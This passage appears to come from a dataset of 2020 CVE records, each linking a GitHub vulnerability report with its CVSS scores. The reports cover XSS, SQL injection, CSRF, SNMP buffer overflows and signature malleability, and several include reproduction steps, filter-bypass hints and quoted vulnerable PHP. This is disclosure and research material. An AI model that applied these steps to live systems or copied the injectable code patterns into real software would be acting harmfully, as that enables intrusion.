  48121. "description": "uri module set string with masked content into content and json output. SUMMARY uri module set string with masked content into content and json output ISSUE TYPE Bug Report COMPONENT NAME uri ANSIBLE VERSION ERRORTAG CONFIGURATION APITAG OS / ENVIRONMENT STEPS TO REPRODUCE yaml hosts: localhost connection: local tasks: name: send request uri: url: \" URLTAG \" user: admin password: admin method: GET force_basic_auth: yes return_content: yes status_code NUMBERTAG register: response name: extract value vars: query: APITAG set_fact: value_content: \"{{ APITAG }}\" value_content_parsed: \"{{ APITAG | from_json | json_query(query) }}\" value_json: \"{{ APITAG }}\" name: debug debug: msg: \"{{ 'something with admin' in value_json }}\" \"{{ 'something with admin' in value_content }}\" \"{{ 'something with admin' in value_content_parsed }}\" \"{{ 'something with ' in value_json }}\" \"{{ 'something with ' in value_content }}\" \"{{ 'something with ' in value_content_parsed }}\" EXPECTED RESULTS The module should return the json/content value with the correct values ACTUAL RESULTS The module seems to apply sensitive info masking (' ') to value matching username/password in its output APITAG",
  48122. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  48123. "severity": "MEDIUM",
  48124. "baseScore": 5.5,
  48125. "impactScore": 3.6,
  48126. "exploitabilityScore": 1.8
  48127. },
  48128. {
  48129. "CVE_ID": "CVE-2020-14408",
  48130. "Issue_Url_old": "https://github.com/agentejo/cockpit/issues/1310",
  48131. "Issue_Url_new": "https://github.com/agentejo/cockpit/issues/1310",
  48132. "Repo_new": "agentejo/cockpit",
  48133. "Issue_Created_At": "2020-06-17T11:03:12Z",
  48134. "description": "Reflected XSS in login panel. Insufficient sanitization of to parameter in APITAG route allows for injection of arbitrary APITAG code into webpage content creating a reflected XSS attack vector. See below POC : APITAG",
  48135. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  48136. "severity": "MEDIUM",
  48137. "baseScore": 6.1,
  48138. "impactScore": 2.7,
  48139. "exploitabilityScore": 2.8
  48140. },
  48141. {
  48142. "CVE_ID": "CVE-2020-14462",
  48143. "Issue_Url_old": "https://github.com/mitre/caldera/issues/1755",
  48144. "Issue_Url_new": "https://github.com/mitre/caldera/issues/1755",
  48145. "Repo_new": "mitre/caldera",
  48146. "Issue_Created_At": "2020-06-15T13:33:47Z",
  48147. "description": "FILETAG I have no idea if you guys are interested in that type of vulnerability but i thought it would be nice to inform you anyway :) ! Have a good day, Defte",
  48148. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  48149. "severity": "MEDIUM",
  48150. "baseScore": 5.4,
  48151. "impactScore": 2.7,
  48152. "exploitabilityScore": 2.3
  48153. },
  48154. {
  48155. "CVE_ID": "CVE-2020-14470",
  48156. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6438",
  48157. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6438",
  48158. "Repo_new": "octopusdeploy/issues",
  48159. "Issue_Created_At": "2020-06-19T04:37:00Z",
  48160. "description": "Helm chart download can leak feed password. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description In certain circumstances, downloading a package from the helm feed can leak the feed password to a deployment log. This means that an authenticated user could see a password that they would potentially not be authorized to view. Affected versions Octopus Server NUMBERTAG APITAG Mitigation Not a lot of good options here: Upgrade to APITAG rotate feed passwords on a regular basis Workarounds None known.",
  48161. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  48162. "severity": "MEDIUM",
  48163. "baseScore": 6.5,
  48164. "impactScore": 3.6,
  48165. "exploitabilityScore": 2.8
  48166. },
  48167. {
  48168. "CVE_ID": "CVE-2020-14927",
  48169. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/19",
  48170. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/19",
  48171. "Repo_new": "navigatecms/navigate-cms",
  48172. "Issue_Created_At": "2020-06-19T04:43:11Z",
  48173. "description": "Cross Site Script Vulnerability APITAG NUMBERTAG Expected behaviour An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the name= \" Aliases \" feature. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Steps to reproduce NUMBERTAG Log into the Admin NUMBERTAG Go to function APITAG > Web sites NUMBERTAG Go to \"create > Aliases > add NUMBERTAG add \"// \"> APITAG \" in textbox Alias and Real URL NUMBERTAG Click \"save\". result FILETAG",
  48174. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  48175. "severity": "MEDIUM",
  48176. "baseScore": 4.8,
  48177. "impactScore": 2.7,
  48178. "exploitabilityScore": 1.7
  48179. },
  48180. {
  48181. "CVE_ID": "CVE-2020-14931",
  48182. "Issue_Url_old": "https://github.com/jaygreig86/dmitry/issues/4",
  48183. "Issue_Url_new": "https://github.com/jaygreig86/dmitry/issues/4",
  48184. "Repo_new": "jaygreig86/dmitry",
  48185. "Issue_Created_At": "2020-06-19T16:45:09Z",
  48186. "description": "Remote Stack Overflow (possible RCE). Continuing my analysis, this software is also vulnerable to stack overflows triggered by responses from WHOIS servers, which is dangerous since these connects are unencrypted TCP. This is distinctly different from CVETAG because the attack vector is a remote adversary (not local), either controlling the WHOIS server or intercepting the victim's unencrypted network traffic. It also exploits a different part of the code. APITAG For simplicity, I'm going to redirect APITAG WHOIS query by modifying my local APITAG : APITAG Next, I use nc to act as the WHOIS server: CODETAG While that's running, let's see what happens in APITAG ERRORTAG Here we obliterated the stack, but a more carefully crafted response may be able to achieve code execution.",
  48187. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48188. "severity": "CRITICAL",
  48189. "baseScore": 9.8,
  48190. "impactScore": 5.9,
  48191. "exploitabilityScore": 3.9
  48192. },
  48193. {
  48194. "CVE_ID": "CVE-2020-14934",
  48195. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/1352",
  48196. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/1352",
  48197. "Repo_new": "contiki-ng/contiki-ng",
  48198. "Issue_Created_At": "2020-08-17T19:31:04Z",
  48199. "description": "Buffer overflow in .bss section due to SNMP request overflow. Description of defect References: FILETAG FILETAG File: FILETAG FILETAG Analysis: Memory access out of buffer boundaries may occur if an SNMP request with number of OIDs larger than supported by the engine is received and processed. The OIDs listed in a request are processed by APITAG function without verification of the varbinds buffer capacity. The buffer is allocated in .bss as a static variable: URLTAG The varbinds memory buffer is written with the values provided in SNMP request: URLTAG The buffer capacity is determined at compile time by the following definition: URLTAG If the number of variables in the request exceeds the allocated buffer a memory write out of the buffer boundaries occurs. The write operation beyond the buffer capacity provides the possibility to overwrite other variables allocated in the .bss section by the application. As the sender of the frame is in control of the content that will be written beyond the buffer limits and there is no strict process memory separation in contiki ng, this issue may allow overwriting of sensitive memory areas of APITAG device. Type: Out of bounds memory write Result: Memory corruption Memory write to initialized variables segment with arbitrary data Target(s) affected by this defect ? contiki ng NUMBERTAG contiki ng NUMBERTAG Fix Rudimentary fix to address the most critical aspect of the issue: URLTAG How is this defect reproduced ? An example hex encoded SNMP request causing out of bounds memory write to varbinds: CODETAG",
  48200. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48201. "severity": "CRITICAL",
  48202. "baseScore": 9.8,
  48203. "impactScore": 5.9,
  48204. "exploitabilityScore": 3.9
  48205. },
  48206. {
  48207. "CVE_ID": "CVE-2020-14935",
  48208. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/1353",
  48209. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/1353",
  48210. "Repo_new": "contiki-ng/contiki-ng",
  48211. "Issue_Created_At": "2020-08-17T19:35:01Z",
  48212. "description": "Stack overflow in SNMP bulk request processing. Description of defect References: FILETAG FILETAG File: FILETAG FILETAG Analysis: Memory access out of buffer boundaries may occur if an SNMP bulk get request with number of OIDs larger than supported by the engine is received and processed. The OIDs listed in a request are processed by APITAG function without verification of the varbinds buffer capacity. The varbinds memory buffer is written with the values provided in SNMP request: URLTAG The buffer capacity is determined by: URLTAG SNMP get bulk requests are processed by APITAG function that allocates a local stack buffer for buffering OIDs of the requested variables. URLTAG The stack buffer in APITAG is populated with OIDs as a first step before any further processing of the data. URLTAG The varbinds_length variable value is not verified against the capacity of the temporary oid stack buffer. If the number of requested OIDs exceeds the buffer capacity a stack buffer overflow condition occurs and stack memory beyond the allocated oid buffer is overwritten with OIDs received in SNMP get bulk request. As the OIDs are supplied in the request content it may be possible to alter the return address from the APITAG function. If the target architecture uses common addressing space for program and data memory (which is common in APITAG devices) it may also be possible to supply code in the SNMP request payload and redirect the execution path to the injected code by modification of the return address. Type: Out of bounds memory write Stack memory overwrite Return address alteration Remote altering of code execution path Remote executable code injection Remote code execution Result: Memory corruption Remote code execution Target(s) affected by this defect ? contiki ng NUMBERTAG contiki ng NUMBERTAG Fix Rudimentary fix to address the most critical aspect of the issue: URLTAG How is this defect reproduced ? 
An example SNMP request causing stack overwrite: CODETAG",
  48213. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48214. "severity": "CRITICAL",
  48215. "baseScore": 9.8,
  48216. "impactScore": 5.9,
  48217. "exploitabilityScore": 3.9
  48218. },
  48219. {
  48220. "CVE_ID": "CVE-2020-14936",
  48221. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/1351",
  48222. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/1351",
  48223. "Repo_new": "contiki-ng/contiki-ng",
  48224. "Issue_Created_At": "2020-08-17T19:24:47Z",
  48225. "description": "Out of bounds memory read/write in SNMP agent. Description of defect References: FILETAG FILETAG File: FILETAG Analysis: Memory access out of buffer boundaries may occur if an SNMP request with malformed OID is processed using APITAG APITAG or APITAG when parsing a request or assembling a response. Buffers dedicated to storing OID values used by the SNMP implementation are fixed size with predefined length configurable at compile time: URLTAG All snmp_varbind_t type variables encapsulate an OID buffer of the predefined length: URLTAG With the following occurences of OID buffers allocation in the SNMP code: Static allocation in .bss: URLTAG Stack allocation: URLTAG APITAG In OID decoding function : URLTAG the length of OID data is not verified against the input buffer remaining length. The value in the buffer is trusted to indicate correct number of following OID data bytes: URLTAG The result of decoding is used for computing pointer to the end of buffer, which may result in buf_end variable pointing beyond the input message end: URLTAG as the BER length decoding function does not perform decoded length validation against the input buffer remaining length: URLTAG In addition to the above, the check of provided oid output buffer in snmp_oid_decode_oid: URLTAG may not protect against the overflow when called from SNMP request parsing function: URLTAG due to the fact that oid_len variable remains uninitialized during the call to the function. As a result of the above, memory beyond provided input buffer may be read accessed and memory beyond target buffer capacity may be written if an OID with length larger than SNMP_MSG_OID_MAX_LEN is present in SNMP request message. As the content of write operation is directly provided in the SNMP request, it may be possible to overwrite stack or .bss memory regions with arbitrary content provided in a request with OID length exceeding SNMP_MSG_OID_MAX_LEN limit. 
APITAG ERRORTAG OID copy and encode functions rely on the fact that the decoded OID has been terminated with a null termination value without verification of the target buffer's capacity. This makes both of the functions vulnerable to similar out of bounds writes. Type: Out of bounds memory read Out of bounds memory write Result: Memory corruption Memory write to areas after the target buffer end with arbitrary data Target(s) affected by this defect ? contiki ng NUMBERTAG contiki ng NUMBERTAG Fix Rudimentary fix to address the most critical aspect of the issue: URLTAG How is this defect reproduced ? Example code demonstrating memory buffer overflow when decoding OID: CODETAG",
  48226. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48227. "severity": "CRITICAL",
  48228. "baseScore": 9.8,
  48229. "impactScore": 5.9,
  48230. "exploitabilityScore": 3.9
  48231. },
  48232. {
  48233. "CVE_ID": "CVE-2020-14937",
  48234. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/1354",
  48235. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/1354",
  48236. "Repo_new": "contiki-ng/contiki-ng",
  48237. "Issue_Created_At": "2020-08-17T19:36:28Z",
  48238. "description": "Out of bounds memory access in SNMP BER decoder/encoder routines. Description of defect References: FILETAG FILETAG File: FILETAG Analysis: Memory access out of buffer boundaries may occur if an SNMP ASN NUMBERTAG BER encoder/decoder routines. The length of provided input/output buffers is insufficiently verified when encoding and decoding data. Lack of boundary checks may lead to out of bounds buffer read or write access. Example functions that make access to memory without prior verification of sufficient input data length: URLTAG URLTAG URLTAG URLTAG URLTAG Type: Out of bounds memory access Result: Memory corruption Invalid memory read access Target(s) affected by this defect ? contiki ng NUMBERTAG contiki ng NUMBERTAG",
  48239. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  48240. "severity": "CRITICAL",
  48241. "baseScore": 9.1,
  48242. "impactScore": 5.2,
  48243. "exploitabilityScore": 3.9
  48244. },
  48245. {
  48246. "CVE_ID": "CVE-2020-14942",
  48247. "Issue_Url_old": "https://github.com/tendenci/tendenci/issues/867",
  48248. "Issue_Url_new": "https://github.com/tendenci/tendenci/issues/867",
  48249. "Repo_new": "tendenci/tendenci",
  48250. "Issue_Created_At": "2020-06-19T05:57:47Z",
  48251. "description": "Unrestricted deserialization. APITAG There is no limit to the input of the pickle called, there will be problems CODETAG query field APITAG Find the request to save the field from the form CODETAG Save the field as follows CODETAG This place is to save the serialized value to the template, and then the front end template uses the encoded value request, and the background is deserialized. eg: FILETAG",
  48252. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48253. "severity": "CRITICAL",
  48254. "baseScore": 9.8,
  48255. "impactScore": 5.9,
  48256. "exploitabilityScore": 3.9
  48257. },
  48258. {
  48259. "CVE_ID": "CVE-2020-14960",
  48260. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2327",
  48261. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2327",
  48262. "Repo_new": "php-fusion/PHP-Fusion",
  48263. "Issue_Created_At": "2020-05-18T03:41:20Z",
  48264. "description": "Authenticated Time base SQL Injection in Comments APITAG Describe the bug I've identified an SQL injection vulnerability in the website APITAG that affects the endpoint PATHTAG and can be exploited via the ctype param. I didn't extract any data from the database, I've confirmed the vulnerability using sleep SQL queries with various arithmetic operations. The sleep command combined with the arithmetic operations will cause the server to sleep for various amounts of time depending on the result of the arithmetic operation. For example, setting the value APITAG APITAG / will cause the server to sleep for sum of three time APITAG NUMBERTAG seconds or sleep NUMBERTAG will cause the server to sleep for NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to login as admin NUMBERTAG Go to Content Admin > Comments NUMBERTAG Filter comments POC: APITAG the following HTTP request APITAG sleep NUMBERTAG s):_ CODETAG APITAG Server to sleep for NUMBERTAG seconds_ FILETAG APITAG the following HTTP request APITAG sleep NUMBERTAG s):_ CODETAG APITAG Server to sleep for NUMBERTAG seconds_ FILETAG Impact An attacker can manipulate the SQL statements that are sent to the APITAG database and inject malicious SQL statements. The attacker is able to change the logic of SQL statements executed against the database or extract sensitive information Desktop (please complete the following information): Windows NUMBERTAG Pro Browser: Firefox XAMPP NUMBERTAG",
  48265. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  48266. "severity": "HIGH",
  48267. "baseScore": 7.2,
  48268. "impactScore": 5.9,
  48269. "exploitabilityScore": 1.2
  48270. },
  48271. {
  48272. "CVE_ID": "CVE-2020-14966",
  48273. "Issue_Url_old": "https://github.com/kjur/jsrsasign/issues/437",
  48274. "Issue_Url_new": "https://github.com/kjur/jsrsasign/issues/437",
  48275. "Repo_new": "kjur/jsrsasign",
  48276. "Issue_Created_At": "2020-06-06T18:11:17Z",
  48277. "description": "Lack of encoding checking in jsrsasign allows a certain degree of malleability in ECDSA signatures. Hello, I've found that jsrsasign NUMBERTAG allows a certain degree of malleability in ECDSA signatures by not checking overflows in the length of sequence and NUMBERTAG s appended or prepended to an integer. Using the secp NUMBERTAG r1 curve it its possible to verify this issue using the following test vectors of Google Wycheproof: ERRORTAG Using the following proof of concept: ERRORTAG The output is: CODETAG However, if you use FILETAG crypto: CODETAG the output is: CODETAG Best regards, Antonio",
  48278. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  48279. "severity": "HIGH",
  48280. "baseScore": 7.5,
  48281. "impactScore": 3.6,
  48282. "exploitabilityScore": 3.9
  48283. },
  48284. {
  48285. "CVE_ID": "CVE-2020-14967",
  48286. "Issue_Url_old": "https://github.com/kjur/jsrsasign/issues/439",
  48287. "Issue_Url_new": "https://github.com/kjur/jsrsasign/issues/439",
  48288. "Repo_new": "kjur/jsrsasign",
  48289. "Issue_Created_At": "2020-06-06T18:19:15Z",
  48290. "description": "The RSA PKCS NUMBERTAG decryption implementation does not detect ciphertext modification (prepended NUMBERTAG s bytes to the ciphertext). The jsrsasign NUMBERTAG RSA PKCS NUMBERTAG decryption implementation does not detect prepended NUMBERTAG s bytes to the ciphertext and accepts modified ciphertexts without error. You can verify this using the following test vectors from Google Wycheproof: ERRORTAG and proof of concept: ERRORTAG with result: APITAG Best regards, Antonio",
  48291. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48292. "severity": "CRITICAL",
  48293. "baseScore": 9.8,
  48294. "impactScore": 5.9,
  48295. "exploitabilityScore": 3.9
  48296. },
  48297. {
  48298. "CVE_ID": "CVE-2020-14968",
  48299. "Issue_Url_old": "https://github.com/kjur/jsrsasign/issues/438",
  48300. "Issue_Url_new": "https://github.com/kjur/jsrsasign/issues/438",
  48301. "Repo_new": "kjur/jsrsasign",
  48302. "Issue_Created_At": "2020-06-06T18:15:25Z",
  48303. "description": "The RSA PSS implementation does not detect signature modification (prepending NUMBERTAG bytes) to the signature. The jsrsasign NUMBERTAG RSASSA PSS (RSA PSS) implementation does not detect prepending NUMBERTAG s to the signature and accepts modified signatures with prepended NUMBERTAG s as valid. You can verify this using the following test vectors from Google Wycheproof: CODETAG in the following proof of concept: ERRORTAG with result: APITAG Best regards, Antonio",
  48304. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48305. "severity": "CRITICAL",
  48306. "baseScore": 9.8,
  48307. "impactScore": 5.9,
  48308. "exploitabilityScore": 3.9
  48309. },
  48310. {
  48311. "CVE_ID": "CVE-2020-14983",
  48312. "Issue_Url_old": "https://github.com/chocolate-doom/chocolate-doom/issues/1293",
  48313. "Issue_Url_new": "https://github.com/chocolate-doom/chocolate-doom/issues/1293",
  48314. "Repo_new": "chocolate-doom/chocolate-doom",
  48315. "Issue_Created_At": "2020-06-22T16:20:12Z",
  48316. "description": "Missing server side num_players validation leading to buffer overflow. Background Version of Chocolate Doom: Chocolate Doom NUMBERTAG from the website) Chocolate Doom git revision APITAG confirmed also in: Crispy Doom NUMBERTAG Operating System and version: Ubuntu NUMBERTAG Compilation: APITAG pwd APITAG Game: ( PATHTAG ) APITAG Bug description When the client starts the game, it sends its settings using the APITAG function. The server receives and parses it in the APITAG function. The settings packet consist of the APITAG integer. This value is used as an maximum value while iterating over corresponding settings and writing them to the APITAG fixed sized NUMBERTAG elements) array. ERRORTAG CODETAG The client can send any byte value and fill the packet with additional bytes to write outside the array and cause stack based buffer overflow. APITAG Modified client's code: CODETAG When all of the clients are connected and the owner starts the game, the server crashes. APITAG Chocolate Doom ASAN: ERRORTAG Chocolate Doom without asan: ERRORTAG Chocolate Doom without stack protection: ERRORTAG Crispy Doom ASAN APITAG ERRORTAG Fix proposition ERRORTAG found by Micha\u0142 Dardas from APITAG",
  48317. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48318. "severity": "CRITICAL",
  48319. "baseScore": 9.8,
  48320. "impactScore": 5.9,
  48321. "exploitabilityScore": 3.9
  48322. },
  48323. {
  48324. "CVE_ID": "CVE-2020-15006",
  48325. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1212",
  48326. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1212",
  48327. "Repo_new": "bludit/bludit",
  48328. "Issue_Created_At": "2020-06-19T07:23:19Z",
  48329. "description": "Store XSS. Describe your problem FILETAG Logo upload only determines the suffix, but not the content, which causes XSS and the user can inject any javascript and html code in the page payload FILETAG FILETAG FILETAG",
  48330. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  48331. "severity": "MEDIUM",
  48332. "baseScore": 5.4,
  48333. "impactScore": 2.7,
  48334. "exploitabilityScore": 2.3
  48335. },
  48336. {
  48337. "CVE_ID": "CVE-2020-15014",
  48338. "Issue_Url_old": "https://github.com/pramodmahato/BlogCMS/issues/1",
  48339. "Issue_Url_new": "https://github.com/pramodmahato/blogcms/issues/1",
  48340. "Repo_new": "pramodmahato/blogcms",
  48341. "Issue_Created_At": "2020-06-24T06:42:26Z",
  48342. "description": "There is a csrf vulnerability in FILETAG file. First,let's look at PATHTAG APITAG file does not filter the \"referer\": APITAG APITAG APITAG \"; echo $site; } $result = mysqli_query($db,\"select from users where email like '$email';\"); $row = mysqli_fetch_assoc($result); APITAG if(isset($_POST['submit'])) { $old=md5($_POST['oldpass']); $new=md5($_POST['newpass']); if($old==$originalpass) { $newsql=\"UPDATE users SET Password = '$new' WHERE email='$email'\"; if(mysqli_query($db, $newsql)){ echo APITAG Changed Successfully\"; APITAG }else { echo \" APITAG ERRORTAG updating record: \".$mysqli_error($db).\"') APITAG \"; } } else { echo \" APITAG APITAG Password') APITAG \"; } } ?> Second,I tested this with the Burp tool. I left out the referer and I added the referer and it returns the same thing. Third:I write a poc for this vulnerability:As follows: APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG testing, the vulnerability exists.",
  48343. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  48344. "severity": "HIGH",
  48345. "baseScore": 8.8,
  48346. "impactScore": 5.9,
  48347. "exploitabilityScore": 2.8
  48348. },
  48349. {
  48350. "CVE_ID": "CVE-2020-15018",
  48351. "Issue_Url_old": "https://github.com/antonraharja/playSMS/issues/605",
  48352. "Issue_Url_new": "https://github.com/playsms/playsms/issues/605",
  48353. "Repo_new": "playsms/playsms",
  48354. "Issue_Created_At": "2020-03-20T06:59:49Z",
  48355. "description": "Session Fixation. APITAG is vulnerable to Session fixation ( all versions, including the latest ). Due to the lack of randomization of the APITAG and reuse of APITAG (prior login, after login). An attacker can set the user's session and can take control of the user's account. Steps to reproduce NUMBERTAG Login to APITAG ( Note down the value of cookie [ PHPSESSID NUMBERTAG Logout NUMBERTAG You can confirm the same session by checking prior login and after logging in NUMBERTAG You can observe that the value of PHPSESSID will be the same as in Step NUMBERTAG",
  48356. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  48357. "severity": "MEDIUM",
  48358. "baseScore": 6.5,
  48359. "impactScore": 2.5,
  48360. "exploitabilityScore": 3.9
  48361. },
  48362. {
  48363. "CVE_ID": "CVE-2020-15026",
  48364. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1214",
  48365. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1214",
  48366. "Repo_new": "bludit/bludit",
  48367. "Issue_Created_At": "2020-06-23T03:25:01Z",
  48368. "description": "Arbitrary file download vulnerability. problem hi, The problem is in the backup plugin, the $file parameter is not filtered, resulting in arbitrary file downloads recurrent FILETAG repair URLTAG url Filter $file parameter",
  48369. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  48370. "severity": "MEDIUM",
  48371. "baseScore": 4.9,
  48372. "impactScore": 3.6,
  48373. "exploitabilityScore": 1.2
  48374. },
  48375. {
  48376. "CVE_ID": "CVE-2020-15041",
  48377. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2330",
  48378. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2330",
  48379. "Repo_new": "php-fusion/PHP-Fusion",
  48380. "Issue_Created_At": "2020-05-19T07:03:05Z",
  48381. "description": "Cross Site Scripting Vulnerability on APITAG Links\" feature in PHP Fusion NUMBERTAG APITAG Version). Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Links\" feature. The script-tag filter can be bypassed by using HTML event handlers, such as \"ontoggle\". To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Site Link NUMBERTAG Insert payload: '> APITAG APITAG APITAG APITAG APITAG load=alert NUMBERTAG APITAG NUMBERTAG Click APITAG Link NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS Expected behavior Removing script tags is not sufficient to prevent an XSS attack; any user-supplied value must be HTML-entity encoded when it is written back into the page. Impact: commonly includes transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
  48382. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  48383. "severity": "MEDIUM",
  48384. "baseScore": 4.8,
  48385. "impactScore": 2.7,
  48386. "exploitabilityScore": 1.7
  48387. },
  48388. {
  48389. "CVE_ID": "CVE-2020-15071",
  48390. "Issue_Url_old": "https://github.com/symphonycms/symphonycms/issues/2917",
  48391. "Issue_Url_new": "https://github.com/symphonycms/symphonycms/issues/2917",
  48392. "Repo_new": "symphonycms/symphonycms",
  48393. "Issue_Created_At": "2020-06-18T01:57:47Z",
  48394. "description": "XSS vulnerability. FILETAG APITAG .... .... .... ERRORTAG .... .... .... ERRORTAG Here data from $_POST is written into the HTML response without escaping, which allows an attacker to trigger an XSS with a payload like fields FILETAG",
  48395. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  48396. "severity": "MEDIUM",
  48397. "baseScore": 6.1,
  48398. "impactScore": 2.7,
  48399. "exploitabilityScore": 2.8
  48400. },
  48401. {
  48402. "CVE_ID": "CVE-2020-15091",
  48403. "Issue_Url_old": "https://github.com/tendermint/tendermint/issues/4926",
  48404. "Issue_Url_new": "https://github.com/tendermint/tendermint/issues/4926",
  48405. "Repo_new": "tendermint/tendermint",
  48406. "Issue_Created_At": "2020-05-31T06:18:15Z",
  48407. "description": "Consensus: APITAG APITAG is invalid\" Error: \"wrong signature\". Tendermint version : Tendermint Core Semantic Version NUMBERTAG P2P Protocol Version NUMBERTAG Block Protocol Version NUMBERTAG CODETAG ABCI app : Cosmos SDK Version NUMBERTAG CODETAG Big Dipper Explorer URL: APITAG Instructions to setup a similar node (I'd suggest just setting up a sentry): APITAG Access to genesis file for chain: APITAG Sample command to get node info: APITAG Discord channel invite (in case you want to live chat with me... I am Neeraj one of the admins): APITAG Environment : OS (e.g. from /etc/os release): APITAG Install tools : Using COSMOS SDK NUMBERTAG Otherwise, not sure what else to say here. Others : We are running a testnet chain with our CRUD database as one of the application modules, in COSMOS. We currently (as of filing this issue) have NUMBERTAG sentries\" and NUMBERTAG alidators. To be clear, the sentries have no voting power and are the only peers that the validators talk to (the validators can talk to each other too). Furthermore, the validators are IP firewalled to only be able to talk to the sentries and other validators. The sentries themselves keep the validator node id's private. Sentry hostnames: CODETAG I am not listing the validator hostnames, since they are inaccessible (due to the firewall) anyways. The validators are only listening on NUMBERTAG to validators and sentries. The sentries are listening on NUMBERTAG and NUMBERTAG and also each run the cosmos REST server, listening on NUMBERTAG We have opened our testnet to the public. Members of the public have setup sentries and validators of their own, and are expected to use our five sentries as their P2P peers in APITAG What happened : For weeks, things on our testnet had been running fine. I had dozens of members of the public running validators on it, just so these people could learn the process of setting up a validator, etc. 
I needed to increase the max of allowed validators (to something much higher than the default value of NUMBERTAG in the PATHTAG value in FILETAG . I think that this particular value is a COSMOS thing, but I wanted to mention it for context. We are not using COSMOS governance yet, so we decided to do a hard reset (ie: generate a new FILETAG and start the chain all over). First, here is what I did on my OWN NUMBERTAG sentries and NUMBERTAG alidators: Stopped all my sentries and validators. Wiped out their .blzd folders (this is the name of my \"home\" folder for my \"blzd\" daemons). Because of this, the nodes will all get new node ids and will be new \"peers\". Re initialized each sentry and validator with \"blzd init\", etc... much like I always do when I setup a validator or sentry from scratch (setting up peers, etc). I had also increased the \"max_num_inbound_peers\" to NUMBERTAG and \"max_num_outbound_peers\" to NUMBERTAG in the [p2p] section of APITAG This might only be anecdotal in value. I had an issue where we had too many connects to my sentries and they were dropping connections on the p2p port. Generated the new genesis. Deployed this genesis to all the sentries and validators. Run the necessary COSMOS commands to get the validators staked, created, etc. Start up all my sentries and validators, (thereby starting up the new chain from block NUMBERTAG Next, here is what I asked the people in the community to do with their validator and/or sentries: Run \"blzd unsafe reset all\" on all their daemons. I asked the community do this instead of wiping out the \".blzd\" folder, to save them some work. Copy over the new FILETAG file, replacing the old FILETAG . Set the new peers list in the p2p section of APITAG Run the necessary COSMOS commands to get the validators staked, created, etc. Start up their sentries and validators. The community slowly started up their daemons. 
